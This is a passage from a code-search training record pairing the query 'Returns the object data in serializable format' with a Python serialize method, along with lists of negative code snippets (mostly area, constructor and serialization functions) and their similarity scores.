0.0\n r = self.geoParam['CylinderLightGuideRadius']\n while(r + self.geoParam['DetectorThickness'] < self.geoParam['CylinderRadius']):\n area -= math.pow(r,2)\n r += self.geoParam['DetectorThickness']\n area += math.pow(r,2)\n r += self.geoParam['DetectorSpacing']\n return math.pi*area", "def _area(bounds):\n return (bounds[0, 1] - bounds[0, 0]) * (bounds[1, 1] - bounds[1, 0])", "def area(self):\n area = self.__length * self.__width\n\n return area", "def area(self):\n return (self.__width * self.__height)", "def area(self):\n return (self.__width * self.__height)", "def area(self):\n return (self.width * self.height)", "def area(self):\n area = 0\n\n for room in self.rooms:\n area += room.polygon.area()\n\n for wall in self.walls:\n area += wall.polygon.area()\n\n return area", "def test_circumference_area(self):\n self.assertEqual(9.425, circumference_area(self.values['radius']))", "def circle_area():\n import math # To use pi\n\n def number_format(num):\n \"\"\"\n Will check for errors when user inputs the number (used for all 4\n numbers).\n :param num: the number inputted\n :return: the proper number\n \"\"\"\n while True:\n try:\n user_input = float(input(num))\n return user_input\n except ValueError:\n print(\"Error. Please enter the desired number. 
You may use \"\n \"decimals.\")\n except:\n print(\"Error: unknown.\")\n\n def calculate_area(radius):\n \"\"\"\n The function that calculates the area of the circle.\n :param radius: The radius of the circle.\n \"\"\"\n area = math.pi * radius ** 2\n print(\"Area of a circle with a radius of\", radius, \"is\",\n format(area, \".3f\"))\n\n def main():\n \"\"\"\n Will ask the user for the radius of the circle, then print the area\n after consulting the function calculate_area(radius).\n \"\"\"\n radius = number_format(\"Please enter the radius of the circle: \")\n calculate_area(radius)\n\n main() # Call to main function, which will run a function within a\n # function.", "def ellipse_area(semi_major_axis: number, semi_minor_axis : number) -> number:\n area = pi*semi_major_axis*semi_minor_axis\n return area", "def rectangle_area(width : number, height : number) ->number:\n area = width*height\n #print(\"The area of rectangle is =\", area, \"sq. units\")\n return area", "def area(self):\n\t\treturn self.width() * self.height()", "def __CalculatePerimeter(self, curve):\r\n return cv2.arcLength(curve, True)", "def area(self):\n return _property_op(arctern.ST_Area, self)", "def perimeter(cnt):\n\treturn cv2.arcLength(cnt, True)", "def shaded_area(l):\n area = area_square(l) - area_circle(l)\n return area", "def area(length, hypotenuse):\n side = int(length)* hypotenuse\n return round(side*2, 2) # returns the rounded area of the roof.", "def calculatearea(self):\r\n return self.width * self.height", "def area(self):\n\t\treturn self.width * self.height", "def rectangle_area(coordinates):\n return (coordinates[2] - coordinates[0]) * (coordinates[3] - coordinates[1])", "def area(self):\n return self.__height * self.__width", "def area(self):\n return self.__height * self.__width", "def area(self):\n return self.__height * self.__width", "def square_area(side):\n return side**2", "def area(self):\n return self.width*self.height", "def area(self):\n return self.width() * self.height()", "def calcular_area_circulo(radio, pi=3.141492):\n radio_int = float(radio)\n area=pi*radio_int**2\n print(area)", "def area(self):\n return self._width * self._height", "def area(self):\n return self.__width * self.__height" ]
[ "0.9091267", "0.8981688", "0.87279946", "0.8713818", "0.8643989", "0.8638605", "0.85790324", "0.8510922", "0.84058666", "0.84058666", "0.8388797", "0.8306146", "0.82901704", "0.8135795", "0.8114081", "0.8105787", "0.8105787", "0.8066629", "0.8049314", "0.8016954", "0.80149436", "0.79954755", "0.7971778", "0.7964131", "0.7944771", "0.79305047", "0.7909514", "0.78016585", "0.77608943", "0.7704746", "0.76927304", "0.7659684", "0.76242435", "0.7545448", "0.75433403", "0.75246304", "0.7520769", "0.743374", "0.7323644", "0.7276443", "0.7230806", "0.72300243", "0.7226463", "0.7148951", "0.7123549", "0.7102877", "0.7092133", "0.70780295", "0.7075342", "0.7070946", "0.7050679", "0.70428836", "0.70326114", "0.7009139", "0.7008671", "0.6970901", "0.6960966", "0.6928084", "0.692158", "0.691441", "0.6895525", "0.68784744", "0.6875036", "0.6850508", "0.6835515", "0.6826276", "0.68028265", "0.67809993", "0.67650396", "0.6757579", "0.6753227", "0.6752179", "0.67470026", "0.6734259", "0.67302555", "0.67302555", "0.6715301", "0.6710108", "0.6706513", "0.6700536", "0.6691746", "0.66785467", "0.6669621", "0.6666843", "0.66652095", "0.66639644", "0.6658473", "0.66562206", "0.66492873", "0.6646874", "0.66381025", "0.6635854", "0.6635854", "0.6635854", "0.6634582", "0.6626104", "0.6617104", "0.66169316", "0.66128707", "0.66071415" ]
0.7715051
29
Alternate constructor using diameter rather than radius
def from_diameter(cls, val): if val < 0: raise ValueError('Diameter must be greater than 0') return cls(val / 2)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def __init__(self, radius=1, thickness=1, inner_radius=0):\n\n super().__init__()\n self.radius = radius\n self.inner_radius = inner_radius\n self.thickness = thickness", "def diameter(self, diameter):\n self.radius = diameter / 2", "def __init__(self, radius):\n self.radius = radius", "def __init__(self, shape, r=2, d=-1):\n self.radius = r\n if d == -1:\n self.stride = 2*r+1\n else:\n self.stride = d\n self.image_shape = shape\n self.patch_shape = ( r*2+1, 2*r+1 )", "def __init__(self, inner_diameter=None, length=None, material=None):\n self.inner_diameter = inner_diameter\n self.length = length\n self.material = material", "def __init__(self, diameter, sigma_color, sigma_space):\n self.v = 0\n self._diameter = diameter\n self._sigma_color = sigma_color\n self._sigma_space = sigma_space", "def __init__(self, c, radius, a0, da):\n Circle.__init__(self, Vector(c).to_2d(), radius)\n self.line = None\n self.a0 = a0\n self.da = da", "def diameter(self):\n return 2 * self.radius", "def __init__( self , center , radius ):\r\n self.center = center\r\n self.radius = radius", "def __init__(self, center=None, radius=1):\n if center is None:\n center = Point()\n self.center = center\n self.radius = radius", "def diameter(self):\n return self.radius * 2", "def diameter(self):\n return self.radius * 2", "def __init__(self, pos, radius):\n super().__init__(pos, radius)", "def __init__(self, pos, radius=0):\n super().__init__(pos, radius)", "def __init__(self, name: str, radius: float):\r\n\r\n Shape.__init__(self, name)\r\n self.__radius = radius\r\n self.validation()", "def __init__(self, center, radius, material):\n self.center = center\n self.radius = radius\n self.material = material", "def __init__(self, center, radius, material):\n self.center = center\n self.radius = radius\n self.material = material", "def __init__(self, pos, radius):\n self.pos = pos\n self.radius = radius", "def __init__(self, *, material: Material, radius=0.0):\n\n assert radius >= 0.0\n\n super().__init__(material=material)\n\n self.radius = radius", "def __init__(self, x_pos, y_pos, radius, colour, moving = False):\n\t\t\n\t\tself.x_pos = x_pos\n\t\tself.y_pos = y_pos\n\t\tself.radius = radius\n\t\tself.diameter = 2*radius\n\t\tself.colour = colour\n\t\tself.moving = moving\n\t\tself.x_vec = 0\n\t\tself.y_vec = 0", "def __init__(self, (x,y), size):\n self.x = x\n self.y = y\n self.size = size\n self.colour = (0,128,255)\n self.thickness = 1\n self.speed = 0.01\n self.angle = math.pi/2", "def __init__(self, name, type_name, diameter, radius_of_curvature, elbow_angle, orientation, surface_roughness):\n self.name = name\n self.type = type_name\n self.diameter = diameter\n self.radius_of_curvature = radius_of_curvature\n self.orientation = orientation\n self.surface_roughness = surface_roughness\n self.elbow_angle = elbow_angle\n self.RperD = radius_of_curvature / diameter\n self.surface_roughnessratio = surface_roughness / diameter", "def __init__(self):\n raise NotImplementedError('cannot create independent arc')", "def __init__(self,r):\n self.radius = r\n self.uc_centered_a = r\n self.uc_centered_b = r*np.sqrt(3.0)", "def __init__(self, center, initialRadius, finalRadius, initialAngle, finalAngle, cartesianImageSize,\n polarImageSize):\n self.center = center\n self.initialRadius = initialRadius\n self.finalRadius = finalRadius\n self.initialAngle = initialAngle\n self.finalAngle = finalAngle\n self.cartesianImageSize = cartesianImageSize\n self.polarImageSize = polarImageSize", "def __init__(self, size=None, color=None, 
clip=None,\n radius=0.):\n BasicFrame.__init__(self, size, color, clip)\n self.radius_value = style.DEF_RADIUS if radius is None else radius\n if 0. <= radius <= 1.:\n self.radius_value = min(self.size) * radius", "def getCircleDiameter(self):\n segments = []\n for (i, p1) in enumerate(self.points):\n for p2 in self.points[i+1:]:\n segments.append(Segment(p1, p2))\n s = max(segments, key=lambda s: s.length)\n return Circle(*s.middle, radius=s.length/2)", "def __init__(self, coordinate, speed_vec, size):\n # todo - validate size 1-3 and int\n self.__size = size\n super().__init__(coordinate, speed_vec, get_radius(size))", "def __init__(self, angle = 0, center = (0, 0)):\n\n self.angle = angle\n self.center = center\n self.size = (2 * 194 + 3, 185)", "def __init__(\r\n self,\r\n centre: Tuple[float, float] = (0.0, 0.0),\r\n ell_comps: Tuple[float, float] = (0.0, 0.0),\r\n einstein_radius: float = 1.0,\r\n core_radius: float = 0.01,\r\n ):\r\n super().__init__(\r\n centre=centre,\r\n ell_comps=ell_comps,\r\n einstein_radius=einstein_radius,\r\n slope=2.0,\r\n core_radius=core_radius,\r\n )", "def diameter(self, diameter):\n\n self._diameter = diameter", "def __init__(\r\n self,\r\n centre: Tuple[float, float] = (0.0, 0.0),\r\n einstein_radius: float = 1.0,\r\n core_radius: float = 0.01,\r\n ):\r\n super().__init__(\r\n centre=centre,\r\n einstein_radius=einstein_radius,\r\n slope=2.0,\r\n core_radius=core_radius,\r\n )", "def __init__(self, name, type_name, length, diameter, orientation, surfaceroughness, hole_diameter):\n self.name = name\n self.type = type_name\n self.length = length\n self.diameter = diameter\n self.orientation = orientation\n self.surfaceroughness = surfaceroughness\n self.hole_diameter = hole_diameter", "def __init__(self, name, type_name, length, diameter, gate_diameter, orientation):\n self.name = name\n self.type = type_name\n self.length = length\n self.diameter = diameter\n self.orientation = orientation\n self.gate_diameter = gate_diameter", "def __init__(self, name, type_name, delta, b, D):\n self.name = name\n self.type = type_name\n self.length = 0\n self.delta = delta\n self.b = b\n self.diameter = D", "def __init__(self, shape: Tuple[int, int], spacing: float, asymmetric_grid: bool):\n cols, rows = shape\n super().__init__(\n CalibrationTargetType.CircleGrid,\n rows,\n cols,\n spacing=spacing,\n asymmetric_grid=asymmetric_grid,\n )", "def __init__(self, name, type_name,h, D, alpha):\n self.name = name\n self.type = type_name\n self.length = 0\n self.h = h\n self.diameter = D\n self.alpha = alpha", "def __init__(self, vert_count, radius):\n\n self.vert_count = vert_count # Number of vertices of polygon\n self.radius = radius # Circumradius\n self.interior_angle_l = None \n self.edge_length_l = None\n self.apothem_l = None \n self.area_l = None \n self.perimeter_l = None", "def diameter(self, value):\n try:\n value = float(value)\n if (value < 0.0) == True:\n print('The diameter must be a non-negative numeric value.')\n return None\n else:\n pass\n \n except TypeError:\n print('You have entered a non-numeric value for the diameter.')\n return None\n except ValueError:\n print('You have entered a non-numeric value for the diameter.')\n return None\n self._radius = value/2.0\n self._diameter = value", "def __init__(self, index=0, radius=0, center=[0, 0], axial=[0, 0], active=0):\n self._index = index\n self._radius = radius\n self._center = [center[0], center[1]]\n self._coord = [axial[0], axial[1]]\n self._active = active\n self._color = (50, 50, 50)", "def 
__init__(self, disk_radius=None, even_sampling=False, no_data_value=None, ignore_labels=None):\n self.disk_radius = disk_radius\n self.ignore_labels = [] if ignore_labels is None else ignore_labels\n self.even_sampling = even_sampling\n self.no_data_value = no_data_value", "def get_radius(self):", "def __init__(self, diameter, height, height_of_reservoir=None, material=None):\n g = 9.81 # m/s**2\n\n self.material = material\n self.diameter = diameter\n self.height = height\n self.volume = np.pi*self.diameter**2/4\n self.height_of_reservoir = height_of_reservoir\n if material and height_of_reservoir:\n self.hydrostatic_pressure = material.density*g*self.height_of_reservoir", "def __init__(self, width, height, circular=True):\n self.width = width\n self.height = height\n self.size = width * height\n self.idx_list = []\n self._depth_buffer = [[] for _ in range(self.size)]\n self._depth = [0] * self.size\n self.circular = circular", "def __init__(self, coordinates, strength=1.0, length=1.0):\n\n super().__init__(\n coordinates=coordinates, strength=strength, length=length)", "def __init__(self, coordinates, strength=1.0, length=1.0):\n\n super().__init__(\n coordinates=coordinates, strength=strength, length=length)", "def circle(self):\n return circle(self.N, self.o, self.r)", "def __init__(self, x_coor, x_speed, y_coor, y_speed, direction):\n self.__x_coor = x_coor\n self.__x_speed = x_speed\n self.__y_coor = y_coor\n self.__y_speed = y_speed\n self.__direction = direction\n self.__radius = self.TORPEDO_RADIUS", "def __init__(self, radius: float, location: tuple, name: str):\n self.loc = location\n self.radius = radius\n self.name = name\n self.verts = []\n self.edges = []\n self.faces = []\n self.mesh_data = None\n self.obj = None", "def __init__(self, x, y, radius, segments=None, angle=math.tau, start_angle=0,\n closed=False, color=(255, 255, 255, 255), batch=None, group=None):\n self._x = x\n self._y = y\n self._radius = radius\n self._segments = segments or max(14, int(radius / 1.25))\n self._num_verts = self._segments * 2 + (2 if closed else 0)\n\n # handle both 3 and 4 byte colors\n r, g, b, *a = color\n self._rgba = r, g, b, a[0] if a else 255\n\n self._angle = angle\n self._start_angle = start_angle\n self._closed = closed\n self._rotation = 0\n\n self._batch = batch or Batch()\n program = get_default_shader()\n self._group = self.group_class(GL_SRC_ALPHA, GL_ONE_MINUS_SRC_ALPHA, program, group)\n\n self._create_vertex_list()\n self._update_vertices()", "def get_radius(self):\r\n return 1", "def __init__(self, *args, radius, fill=False, color=colors.WHITE, border_color=None, area_color=None,\n center_color=None, radius_color=None, radius_width=1, text_color=None, text_size=20):\n if len(args) == 1: args = args[0]\n self.position = list(args)\n self.radius = radius\n self.fill = fill\n if color:\n if not border_color: border_color = color\n if not area_color: area_color = color\n if not radius_color: radius_color = color\n if not text_color: text_color = color\n self.border_color = border_color\n self.area_color = area_color\n self.center_color = center_color\n self.radius_color = radius_color\n self.radius_width = radius_width\n self.text_color = text_color\n self.text_size = text_size", "def _circle(i, r=.05):\n\treturn Circle((i, 0), r, fill=True, color='black')", "def __init__(self, a, **kwargs):\r\n center = kwargs.get('center')\r\n density = kwargs.get(\"density\")\r\n spheroid.__init__(self, a, center=center, density=density)", "def get_radius(size):\n return (size * 10) - 5", 
"def __init__(self, x, y, max_pop, radius=50, color=RED, infected_pop=0, infected_rate=1.1, dead_pop=0, death_rate=1, airborne_rate=0):\n self.initial_pos = (x, y)\n self.x = x\n self.y = y\n self.color = color\n self.radius = radius\n self.infected_pop = infected_pop\n self.infected_rate = infected_rate\n self.max_pop = max_pop\n self.dead_pop = dead_pop\n self.death_rate = death_rate\n self.airborne_rate = airborne_rate", "def __init__(self, *components, mode=0, size=[0.1, 0.1], width=1, radius=0.02, fill=False, color=colors.WHITE,\n conversion=True):\n if components != ():\n if type(components[0]) == list:\n components = components[0]\n self.components = list(components)\n self.mode = mode\n self.size = size\n self.width = width\n self.radius = radius\n self.fill = fill\n self.color = color\n self.conversion = conversion", "def objects_radius(self, centre, radius):", "def __init__(self, width, height, radius, k=20):\n self.width = width\n self.height = height\n self.radius = radius\n self.k = k\n self.cell_size = self.radius * 1.0 / np.sqrt(2.0)\n self.grid_width = int(np.ceil(self.width / self.cell_size))\n self.grid_height = int(np.ceil(self.height / self.cell_size))\n self.grid = [-1] * (self.grid_height * self.grid_width)\n self.queue = []\n self.samples = []", "def make_circle(x, y, r):\n\tnew_circle = Circle()\n\tnew_circle.x = x\n\tnew_circle.y = y\n\tnew_circle.r = r\n\treturn new_circle", "def __init__(self,circlePos,circleRad,circleVel):\n self.circlePos=circlePos\n self.circleRad=circleRad\n self.circleVel=circleVel", "def __init__(self, scr, color, pos, radius, width=0):\n self.scr = scr\n self.color = color\n self.pos = pos\n self.r = radius\n self.width = width\n return", "def __init__(self, centre: np.ndarray, radius: float, start_degrees: float, end_degrees: float):\n self.centre = np.reshape(centre, 2)\n self.radius = radius\n self.start_degrees = start_degrees\n self.end_degrees = end_degrees", "def __init__(self, master, x, y, size):\n self.master = master\n self.abs = x\n self.ord = y\n self.size= size\n self.fill= False", "def create_circle(self, x, y, r, **kwargs):\n return self.create_oval(*self.circ_to_oval(x, y, r), **kwargs)", "def __init__(self, radius):\n try:\n radius = float(radius)\n if (radius < 0.0) == True:\n print('The radius must be a non-negative numeric value.')\n return None\n #I put this here to abort construction. 
Im not sure its working the way I want.\n else:\n pass\n except TypeError:\n print('You have entered a non-numeric value for the radius.')\n return None\n except ValueError:\n print('You have entered a non-numeric value for the radius.')\n return None\n #Class parameters (radius, diameter)\n self._radius = radius\n #Task 1\n self._diameter = self._radius*2\n #Task 2", "def test_set_diameter():\n radius = 10\n c = Circle(radius) \n expected_diameter = 10 \n c.diameter = expected_diameter \n assert c.diameter == expected_diameter\n assert c.radius == expected_diameter / 2", "def __init__(self):\n self.x = 0.0\n self.y = 0.0\n self.theta = 0.0\n self.total_distance_covered = 0.0", "def __init__(self,\n height=None,\n length=None,\n weight=None,\n width=None):\n\n # Initialize members of the class\n self.height = height\n self.length = length\n self.weight = weight\n self.width = width", "def __init__(self, coordinates, strength=1.0):\n\n super().__init__(coordinates=coordinates, strength=strength)", "def __init__(self, coordinates, strength=1.0):\n\n super().__init__(coordinates=coordinates, strength=strength)", "def __init__(self, coordinates, strength=1.0):\n\n super().__init__(coordinates=coordinates, strength=strength)", "def __init__(self):\n self.x = int(constants.SCREEN_WIDTH/2)\n self.y = int(constants.SCREEN_HEIGHT/2)\n self.DX = self.getRandSpeed()\n self.DY = self.getRandSpeed()\n self.RADIUS = 5", "def __init__(self, size, mu, theta, sigma):\n self.mu = mu * np.ones(size)\n self.theta = theta\n self.sigma = sigma\n self.reset()", "def __init__(self, length, sides):\n self._sides = sides\n self._length = length", "def __init__(self, size, x=0, y=0, id=None):\n super().__init__(size, size, x, y, id)\n self.size = size", "def __init__(self, name: str=None, red: float=None, green: float=None, blue: float=None, radius: float=None, modifier: str='void'): # noqa: E501\n self.swagger_types = {\n 'name': str,\n 'red': float,\n 'green': float,\n 'blue': float,\n 'radius': float,\n 'modifier': str\n }\n\n self.attribute_map = {\n 'name': 'name',\n 'red': 'red',\n 'green': 'green',\n 'blue': 'blue',\n 'radius': 'radius',\n 'modifier': 'modifier'\n }\n\n self._name = name\n self._red = red\n self._green = green\n self._blue = blue\n self._radius = radius\n self._modifier = modifier", "def __init__(self,x_c,z_c,cyl_rad):\n self.x_c = x_c\n self.z_c = z_c\n self.cyl_rad = cyl_rad", "def __init__(self,x_c,z_c,cyl_rad):\n self.x_c = x_c\n self.z_c = z_c\n self.cyl_rad = cyl_rad", "def __init__(self,x_c,z_c,cyl_rad):\n self.x_c = x_c\n self.z_c = z_c\n self.cyl_rad = cyl_rad", "def __init__(self,x_c,z_c,cyl_rad):\n self.x_c = x_c\n self.z_c = z_c\n self.cyl_rad = cyl_rad", "def __init__(self,x_c,z_c,cyl_rad):\n self.x_c = x_c\n self.z_c = z_c\n self.cyl_rad = cyl_rad", "def __init__(self, normal, distance):\r\n self.normal = normal\r\n self.distance = distance", "def _init_parameters(self,diameterInd):\n\n\t\t# topological parameters\n\t\tself.nNodes = 21\n\t\tself._axonNodes=self.nNodes\n\t\tself._paraNodes1=40\n\t\tself._paraNodes2=40\n\t\tself._axonInter=120\n\t\tself._axonTotal=221\n\t\t# morphological parameters\n\t\tpossibleDiameters = [5.7, 7.3, 8.7, 10.0, 11.5, 12.8, 14.0, 15.0, 16.0]\n\t\tself._fiberD=possibleDiameters[diameterInd]\n\t\tself._paraLength1=3 \n\t\tself._nodeLength=1.0\n\t\tself._spaceP1=0.002 \n\t\tself._spaceP2=0.004\n\t\tself._spaceI=0.004\n\t\t# electrical parameters\n\t\tself._rhoa=0.7e6 #Ohm-um\n\t\tself._mycm=0.1 #uF/cm2/lamella membrane\n\t\tself._mygm=0.001 
#S/cm2/lamella membrane\n\n\t\tif self._fiberD==5.7:\n\t\t\tself._g=0.605 \n\t\t\tself._axonD=3.4\n\t\t\tself._nodeD=1.9\n\t\t\tself._paraD1=1.9\n\t\t\tself._paraD2=3.4\n\t\t\tself._deltax=500\n\t\t\tself._paraLength2=35\n\t\t\tself._nl=80\n\t\tif self._fiberD==8.7:\n\t\t\tself._g=0.661\n\t\t\tself._axonD=5.8\n\t\t\tself._nodeD=2.8\n\t\t\tself._paraD1=2.8\n\t\t\tself._paraD2=5.8\n\t\t\tself._deltax=1000\n\t\t\tself._paraLength2=40\n\t\t\tself._nl=110\n\t\tif self._fiberD==10.0:\n\t\t\tself._g=0.690\n\t\t\tself._axonD=6.9\n\t\t\tself._nodeD=3.3\n\t\t\tself._paraD1=3.3\n\t\t\tself._paraD2=6.9\n\t\t\tself._deltax=1150\n\t\t\tself._paraLength2=46\n\t\t\tself._nl=120\n\t\tif self._fiberD==11.5:\n\t\t\tself._g=0.700\n\t\t\tself._axonD=8.1\n\t\t\tself._nodeD=3.7\n\t\t\tself._paraD1=3.7\n\t\t\tself._paraD2=8.1\n\t\t\tself._deltax=1250\n\t\t\tself._paraLength2=50\n\t\t\tself._nl=130\n\t\tif self._fiberD==12.8:\n\t\t\tself._g=0.719\n\t\t\tself._axonD=9.2\n\t\t\tself._nodeD=4.2\n\t\t\tself._paraD1=4.2\n\t\t\tself._paraD2=9.2\n\t\t\tself._deltax=1350\n\t\t\tself._paraLength2=54\n\t\t\tself._nl=135\n\t\tif self._fiberD==14.0:\n\t\t\tself._g=0.739\n\t\t\tself._axonD=10.4\n\t\t\tself._nodeD=4.7\n\t\t\tself._paraD1=4.7\n\t\t\tself._paraD2=10.4\n\t\t\tself._deltax=1400\n\t\t\tself._paraLength2=56\n\t\t\tself._nl=140\n\t\tif self._fiberD==15.0:\n\t\t\tself._g=0.767\n\t\t\tself._axonD=11.5\n\t\t\tself._nodeD=5.0\n\t\t\tself._paraD1=5.0\n\t\t\tself._paraD2=11.5\n\t\t\tself._deltax=1450\n\t\t\tself._paraLength2=58\n\t\t\tself._nl=145\n\t\tif self._fiberD==16.0:\n\t\t\tself._g=0.791\n\t\t\tself._axonD=12.7\n\t\t\tself._nodeD=5.5\n\t\t\tself._paraD1=5.5\n\t\t\tself._paraD2=12.7\n\t\t\tself._deltax=1500\n\t\t\tself._paraLength2=60\n\t\t\tself._nl=150\n\n\t\tself._Rpn0=(self._rhoa*.01)/(np.pi*((((self._nodeD/2)+self._spaceP1)**2)-((self._nodeD/2)**2)))\n\t\tself._Rpn1=(self._rhoa*.01)/(np.pi*((((self._paraD1/2)+self._spaceP1)**2)-((self._paraD1/2)**2)))\n\t\tself._Rpn2=(self._rhoa*.01)/(np.pi*((((self._paraD2/2)+self._spaceP2)**2)-((self._paraD2/2)**2)))\n\t\tself._Rpx=(self._rhoa*.01)/(np.pi*((((self._axonD/2)+self._spaceI)**2)-((self._axonD/2)**2)))\n\t\tself._interLength=(self._deltax-self._nodeLength-(2*self._paraLength1)-(2*self._paraLength2))/6", "def __init__(self, d=1):\r\n self.depth = d", "def __init__(self, radius=0.5, extra={}):\n self.radius = radius\n self.sensors = [] # array of Attached\n self.id_sensors = None\n self.id_dynamics = None # XXX\n self.dynamics = None\n self.extra = extra\n\n self.primitives = set()\n\n # Needs to be initialized before calling certain functions\n self._state = None", "def createFromPointAndRadius(cls, point, radius, **kwargs):\n return cls(*point, radius=radius, **kwargs)", "def __init__(self, grating: float, diameter: float, origin=[0., 0.], theta=0.,\n interference=1.,\n blocker_diameter: float = float('+Inf'),\n default_wavelengths: list = [532., 430, 650.],\n flipped: bool = False):\n\n Mirror.__init__(self, diameter, origin, theta, blocker_diameter, flipped)\n\n self.mirroring = False\n self.grating = grating\n self.interference = interference\n self.default_wavelengths = default_wavelengths", "def __init__(self, point, angle, color=colors.WHITE, width=1):\n super().__init__(point, angle, color=color, width=width, correct=False)", "def initP0(self, size, radius):\n return h.circle(size, radius)[:, :, 0]", "def computeA(diameter):\n radius = diameter / 2.0\n return np.pi * (radius**2)", "def from_plane_and_radius(cls, plane, radius):\n return cls(radius, 
frame=Frame.from_plane(plane))", "def __init__(self, num_sides=6):\n self.num_sides = num_sides", "def __init__(self, num_sides=6):\n self.num_sides = num_sides", "def __init__(self, num_sides=6):\n self.num_sides = num_sides", "def __init__(self, L_values=None, scatteringRadius=None, **kwargs):\n index = 0\n for attr in self.optAttrList:\n setattr(self, attr, kwargs.get(attr))\n self.L_values = L_values or []\n self.scatteringRadius = scatteringRadius\n if self.scatteringRadius: self.scatteringRadius.setAncestor( self )", "def __init__(self, master, x, y, size, colour):\n self.master = master\n self.abs = x\n self.ord = y\n self.size= size\n self.fill= colour", "def __init__(self, width=10, height=10, density=0.25):\n\t\tself.width = width\n\t\tself.height = height\n\t\t# create marks and mine field\n\t\tself.marks = [[CLOSED for _ in range(height)] for _ in range(width)]\n\t\tself.mines = [[random.random() < density for _ in range(height)] \n\t\t for _ in range(width)]", "def Radius(self, *args):\n return _Bnd.Bnd_Sphere_Radius(self, *args)", "def __init__(self, angle = 'deg'):\n \n name = \"Cylindrical\"\n Qstr = [\"r\", \"phi\", \"z\"]\n Xstr = [\"x\", \"y\", \"z\"]\n \n super().__init__(self._csCylindrical_q2x, nQ = 3,\n nX = 3, name = name, \n Qstr = Qstr, Xstr = Xstr,\n maxderiv = None, isatomic = False,\n zlevel = None)\n \n if angle == 'deg' or angle == 'rad':\n self.angle = angle # 'deg' or 'rad'\n else:\n raise ValueError('angle must be ''deg'' or ''rad''.')" ]
[ "0.7655539", "0.7464638", "0.71278536", "0.7123325", "0.7113612", "0.71134126", "0.7005773", "0.69776356", "0.68636364", "0.67984104", "0.678745", "0.678745", "0.6740642", "0.6733681", "0.6701746", "0.6677398", "0.6677398", "0.66244286", "0.6590522", "0.6543615", "0.64221567", "0.63389647", "0.62761277", "0.6240987", "0.6239006", "0.62186664", "0.6199971", "0.6177248", "0.616721", "0.61354274", "0.6130588", "0.61239797", "0.6119473", "0.61187446", "0.61064523", "0.6039022", "0.60348356", "0.60311764", "0.60182154", "0.6010675", "0.60003245", "0.59961665", "0.5960911", "0.5956303", "0.594565", "0.594565", "0.5940826", "0.5937744", "0.5927707", "0.59126663", "0.5905071", "0.59033126", "0.5900206", "0.5897612", "0.58667886", "0.58525425", "0.58102375", "0.57985866", "0.5793406", "0.57793385", "0.5770428", "0.5769469", "0.5753497", "0.5751543", "0.5746786", "0.5745165", "0.57449794", "0.57402414", "0.57316697", "0.5722496", "0.5722496", "0.5722496", "0.57212627", "0.5711052", "0.57071847", "0.5697192", "0.569603", "0.5687406", "0.5687406", "0.5687406", "0.5687406", "0.5687406", "0.568219", "0.56807256", "0.56732756", "0.5664853", "0.56576794", "0.56548035", "0.5647639", "0.5645089", "0.56371593", "0.56362796", "0.56360304", "0.56360304", "0.56360304", "0.56341034", "0.56332606", "0.5628254", "0.5627414", "0.56181055" ]
0.67468303
12
Returns the object data in serializable format
def serialize(self): return { 'username': self.username, 'email': self.email, 'joinedDate': self.joinedDate }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def GetDataAsObject(self):", "def serialize(self, obj):\n return obj", "def data(self):\n retval = copy.deepcopy(self.__dict__)\n retval[\"_Serializable_classname\"] = type(self).__name__\n retval[\"_Serializable_version\"] = \"1.0\"\n return retval", "def to_data(self):\n return self.data", "def serialize(self, obj):\n pass", "def serialize(self, data):\n return data", "def serialize(self):", "def SerializeObject(self, data):\n\n if isinstance(data,dict):\n serializad_data = json.dumps(data)\n else:\n serializad_data = json.dumps(data.__dict__)\n\n return serializad_data", "def serialize(self):\n pass", "def dump(self):\n return self._data.dump()", "def serialize(obj):\n return serialization_manager.serialize(obj)", "def dump(self):\n return json.dumps(self.__data)", "def serialize(self, data):", "def serialize_forstorage(cls, obj):\n return misc.serialize_forstorage(obj)", "def data(self):\n if self._data is None:\n if self.many:\n self._data = [self.to_native(item) for item in self.object]\n else:\n self._data = self.to_native(self.object)\n return self._data", "def _serialise(self):\n # TODO (M Foley)\n pass", "def data(self):\n return self.__dict__", "def serialize(obj):\n return pickle.dumps(obj)", "def get_data(self):\n return self.data.to_json()", "def dump(self):\n return {\"data\": self.data, \"encoding\": self.encoding,\n \"type\": self.type_name}", "def dump():\n\t\treturn self.__dict__;", "def getData(self):\n return dict(self._dump_data)", "def serialize(self):\n return {\n 'id' : self.id,\n 'name' : self.name,\n 'date' : str(self.date),\n 'owner_id' : self.owner_id,\n }", "def to_dict(self):\n serialized = self._serializer().dump(self)\n return serialized.data", "def dumps(self):\n return dumps(self)", "def serialize(self) -> typing.Any:\n return self._serialize(self.__dict__)", "def dump_object(self):\n if self._conf is None: self.load() # lazy load # noqa: E701\n return deepcopy(self._data)", "def serialize(self):\n return self.record", "def serialize(self):\n return {\n\n\n }", "def serialize(self, obj, for_read=False):\n\n serializer = self.get_serializer()\n return serializer.serialize(obj.to_python(for_read=for_read))", "def dumps(self, data):\n return dumps(data)", "def to_string(self):\n return json.dumps(self.to_json(), cls=ObjectEncoder)", "def __marshallable__(self):\n return dict(self.__dict__)['_data']", "def to_json_string(self) -> None:\n return json.dumps(dataclasses.asdict(self)) + \"\\n\"", "def serialize(self, obj):\n return json.dumps(obj)", "def serialize(self, obj):\n return dill.dumps(obj, 0).decode('latin-1')", "def dump_object(self, value):\n return pickle.dumps(value)", "def serialize(self, data):\n raise NotImplementedError", "def serialize(self):\n\n\t\treturn str(self)", "def serialize(self):\n data = {}\n\n for k, v in self.__dict__.items():\n if not k.startswith('__'):\n data[k] = v\n\n return data", "def serialize(self):\n return {\n \"id\": self.id,\n \"name\": self.name,\n \"detail\": self.detail,\n \"date_on\": self.date_on,\n }", "def serialize(self):\n return {\n 'id' : self.id,\n 'name' : self.name,\n 'owner' : self.user.name,\n 'room' : self.room.name,\n 'description' : self.description,\n 'price' : self.price,\n }", "def data(self):\n return self._data", "def serialize(self):\n return {\n 'name' : self.name,\n 'description' : self.description,\n 'id' : self.id,\n 'picture' : self.picture,\n 'catalog_id' : self.catalog_id,\n 'user_id' : self.user_id,\n 'last_edit' : self.time_str,\n }", "def serialize(self):\n return {\n 'id': 
